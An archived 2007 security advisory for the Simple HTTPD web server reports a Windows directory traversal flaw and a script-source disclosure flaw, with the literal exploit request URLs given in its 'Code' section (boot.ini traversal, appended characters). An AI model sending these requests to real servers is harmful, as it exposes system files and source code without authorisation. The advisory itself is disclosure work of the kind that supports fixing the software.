simple-traverse.txt

simple-traverse.txt: Posted Dec 8, 2007; Authored by Luigi Auriemma | Site aluigi.org; Simple HTTPD versions 1.38 and below suffer from directory traversal and script viewing vulnerabilities. Details for exploitation provided.; tags | exploit, vulnerability, file inclusion; SHA-256 | 220234da94019862c8340f60a0ef109dfe80c76cbe779cadcc4d9038ee5ea2db; Download | Favorite | View

simple-traverse.txt


#######################################################################

                             Luigi Auriemma

Application:  Simple HTTPD
              http://shttpd.sourceforge.net
Versions:     <= 1.38
Platforms:    Windows, *nix, QNX, RTEMS
              only Windows seems vulnerable
Bugs:         A] directory traversal
              B] scripts and CGI viewing/downloading
                 (%20 char found by Shay priel in Jun 2007)
Exploitation: remote
Date:         07 Dec 2007
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Simple HTTPD (shttpd) is an open source web server created for embedded
systems.


#######################################################################

=======
2) Bugs
=======

----------------------
A] directory traversal
----------------------

Using the "..\" pattern is possible to download any file in the disk on
which is located the web root directory.


--------------------------------------
B] scripts and CGI viewing/downloading
--------------------------------------

Any script or CGI in the server can be viewed/downloaded instead of
being executed simply appending the chars '+', '.', %20 (this one
reported by Shay priel in the summer 2007), %2e and any other byte (in
hex format too) major than 0x7f to the requested filename.


Note that only Windows seems vulnerable to the above bugs.


#######################################################################

===========
3) The Code
===========


A]
http://SERVER/..\..\..\boot.ini
http://SERVER/..\%2e%2e%5c..\boot.ini

B]
http://SERVER/file.php+
http://SERVER/file.php.
http://SERVER/file.php%80
http://SERVER/file.php%ff


#######################################################################

======
4) Fix
======


I have posted the problems in the shttpd-general mailing-list but there
is no reply yet:

  http://sourceforge.net/mailarchive/forum.php?forum_name=shttpd-general


#######################################################################


--- 
Luigi Auriemma
http://aluigi.org

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

simple-traverse.txt

simple-traverse.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

simple-traverse.txt

Share This

simple-traverse.txt

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems